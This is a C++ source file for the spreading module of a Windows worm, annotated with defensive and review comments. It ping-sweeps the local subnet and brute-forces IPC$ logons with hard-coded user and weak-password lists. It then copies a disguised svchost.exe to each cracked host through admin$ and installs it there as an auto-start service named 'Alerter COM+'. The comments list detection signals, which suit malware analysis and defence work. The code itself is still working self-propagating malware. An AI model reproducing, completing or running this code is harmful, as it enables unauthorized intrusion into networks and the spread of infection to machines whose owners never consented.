📄 ipcold.h
// NetScan.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "winsvc.h"
#include "winsock2.h"
#pragma comment(lib,"ws2_32.lib")
#include "PingI.h"
#include "winnetwk.h"
#pragma comment(lib,"mpr.lib")
// Hard-coded credential dictionary: account names that IPC_thread pairs with every
// entry of pass[] and hands to ConnectRemote. The list is terminated by a 0 entry.
// Defensive note: these are stock or default-style account names, so remote logon
// attempts against them from a peer machine are a useful detection signal.
const char *user[]={
"administrator","admin",
"admin$","administrator$",
"king","student",
"teacher","root",
"goto","hack",
"temp","admin888",
"admin1234","home",
"owner","Guest",
"fuck","you",
0};
// Hard-coded password dictionary, terminated by a 0 entry. The literal "NULL" is a
// sentinel: ConnectRemote replaces it with a null pointer before the logon attempt.
// Defensive note: every entry is a short dictionary word, digit run or keyboard
// pattern; a password policy or banned-password list that rejects such values removes
// the condition this module depends on.
const char *pass[]={
"NULL","whboy",
"administrator","admin",
"king","student",
"teacher","root",
"goto","hack",
"temp","admin888",
"admin1234","home",
"owner","Guest",
"fuck","you",
"1234","8888",
"hack","admin$",
"5201314","5203344",
"1234567","12345678",
"asdf","qwer",
"88888888","111111111",
"pass","password",
"computer","superman",
"login","love",
0};
// ConnectRemote: tries one user name / password pair against the IPC$ share of
// RemoteIP and, when the connection is accepted, copies a binary to the host over
// admin$ and registers it there as a service.
//
// Parameters:
//   RemoteIP    host name or address text inserted into the UNC paths built below
//   lpUserName  account name passed to WNetAddConnection2
//   lpPassword  password; the literal "NULL" (case-insensitive) becomes a null pointer
// Returns 0 when the remote service could be opened for start (the StartService
// result itself is not checked); otherwise the initial value (DWORD)-1.
//
// Artifacts a defender can key on, all literal in this function:
//   - a session to the ipc$ share of the target followed by a file write to
//     admin$ at system32/IME/svchost.exe
//   - a service with name and display name "Alerter COM+", auto-start, own-process and
//     interactive, whose image path is a svchost.exe under system32/IME rather than
//     directly under system32
//   - on the target, a burst of failed network logons before any success and a
//     service-installation record (commonly Windows events 4625 and 7045; confirm
//     against the audit policy in use)
// Conditions it relies on: a guessable password on an account with administrative
// rights, and reachable SMB plus remote service control between peer machines.
DWORD ConnectRemote(const char *RemoteIP,const char *lpUserName,const char *lpPassword)
{
char lpIPC[256];
DWORD dwErrorCode,dwReturn=-1;
NETRESOURCE NetResource={0};
// UNC name of the target's IPC$ share; no local device is mapped (lpLocalName is NULL).
sprintf(lpIPC,"\\\\%s\\ipc$",RemoteIP);
NetResource.lpLocalName = NULL;
NetResource.lpRemoteName = lpIPC;
NetResource.dwType = RESOURCETYPE_ANY;
NetResource.lpProvider = NULL;
// "NULL" in the password list is a sentinel for passing a null pointer.
// NOTE(review): per the WNetAddConnection2 documentation a null password selects the
// default password associated with the user, not an empty password - confirm intent.
if(!stricmp(lpPassword,"NULL"))
{
lpPassword=NULL;
}
//printf("Now Connecting ...... ");
dwErrorCode=WNetAddConnection2(&NetResource,lpPassword,lpUserName,CONNECT_INTERACTIVE);
if(dwErrorCode==NO_ERROR)
{
// printf("Success !\n");
char LocalFile[256];
char RemoteFile[256];
// Source path: <local system directory>\IME\svchost.exe on the machine running this code.
::GetSystemDirectory(LocalFile,sizeof(LocalFile));
strcat(LocalFile,"\\IME\\svchost.exe");
// Destination path: the same relative location on the target, reached through admin$.
sprintf(RemoteFile,"\\\\%s\\admin$\\system32\\IME\\svchost.exe",RemoteIP);
// Copy the file to the remote host (third argument FALSE: an existing file is overwritten)
if (::CopyFile(LocalFile,RemoteFile,FALSE))
{
SC_HANDLE hSCManager,hService;
char RemoteName[256];
// Create and start the service:
sprintf(RemoteName,"\\\\%s",RemoteIP);
// Open the Service Control Manager on the remote machine with full access
hSCManager = OpenSCManager(RemoteName, NULL, SC_MANAGER_ALL_ACCESS);
if (hSCManager!=NULL)
{
// The CreateService result is not checked; the handle is overwritten by the
// OpenService call below, so a service of this name that already exists is
// opened and started as well.
hService = CreateService(hSCManager,"Alerter COM+","Alerter COM+",SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,"%SystemRoot%\\system32\\IME\\svchost.exe",
NULL, NULL, NULL, NULL, NULL);
hService=::OpenService(hSCManager,"Alerter COM+",SERVICE_START);
if (hService!=NULL)
{
// Success is reported as soon as the service handle was obtained.
::StartService(hService,0,NULL);
::CloseServiceHandle(hService);
dwReturn=0;
}
::CloseServiceHandle(hSCManager);
}
}
}
//printf("Now Disconnecting ... ");
// The connection is always torn down (forced, third argument TRUE), whether or not
// the logon worked; one retry is made if the first cancel reports an error.
dwErrorCode=WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);
if(dwErrorCode!=NO_ERROR)
{
WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);
}
return dwReturn;
}
// IPC_thread: thread entry point that sweeps the addresses sharing the first three
// octets of a local address and calls ConnectRemote, with every user[]/pass[] pair,
// for each host that answers a ping.
// dParam is not used. Returns FALSE (0) when Winsock 2.2 is not reported, otherwise 0
// after the sweep.
//
// Network behaviour a defender can key on: one host pinging final octets 1 through 253
// of its own range in ascending order, each responder then receiving a rapid series of
// ipc$ connection attempts under many different account names.
unsigned long CALLBACK IPC_thread(LPVOID dParam)
{
WORD wVersion =0 ;
int errret = -1;
WSADATA wsaData;
wVersion = MAKEWORD(2,2);
// errret is stored but never examined; only the version written to wsaData is checked.
errret = WSAStartup(wVersion,&wsaData);
if( LOBYTE( wsaData.wVersion) != 2 ||
HIBYTE( wsaData.wVersion) !=2 )
{
// MessageBox(NULL,"winsock library version too low","Notice",MB_OK);
return FALSE;
}
/* Get the local computer name */
CHAR szHostName[128]={0}; // buffer that receives the local host name
struct hostent * pHost; // host entry returned by gethostbyname
int i; // index into pHost->h_addr_list
SOCKADDR_IN saddr;
if(gethostname(szHostName,128)==0) // the local host name was obtained
{
pHost = gethostbyname(szHostName);
// Each iteration overwrites saddr, so the last address in the list is the one kept.
for( i = 0; pHost!= NULL && pHost->h_addr_list[i]!= NULL; i++ )
{
memset(&saddr,0,sizeof(saddr));
memcpy(&saddr.sin_addr.s_addr, pHost->h_addr_list[i], pHost->h_length);
}
}
char ip[128];
int count;
BOOL bpingOK=FALSE;
// NOTE(review): saddr is written only inside the loop above; if no address was
// resolved, the octets read below are indeterminate.
for(count=1;count<254;count++)
{
memset(ip,0,128);
// Candidate address: first three octets of the local address, final octet = count.
sprintf(ip,
"%d.%d.%d.%d",
saddr.sin_addr.S_un.S_un_b.s_b1,
saddr.sin_addr.S_un.S_un_b.s_b2,
saddr.sin_addr.S_un.S_un_b.s_b3,
count);
// CPingI is declared in PingI.h, which is not shown here; presumably Ping returns
// nonzero when the host replies and the first argument is a count or timeout - confirm.
CPingI m_PingI;
bpingOK = m_PingI.Ping(2,(LPCSTR)ip,NULL);
if (bpingOK)
{// Try each user name / password pair against the host
for(int i = 0;user[i]; i++)
{
for (int j=0;pass[j];j++)
{
// break leaves only the password loop: after a success the remaining user
// names are still tried against the same host.
if (ConnectRemote(ip,user[i],pass[j])==0)
break;
}
}
}
}
WSACleanup();
//printf("Hello World!\n");
return 0;
}
/*
void main()
{
IPC_thread(NULL);
}
*/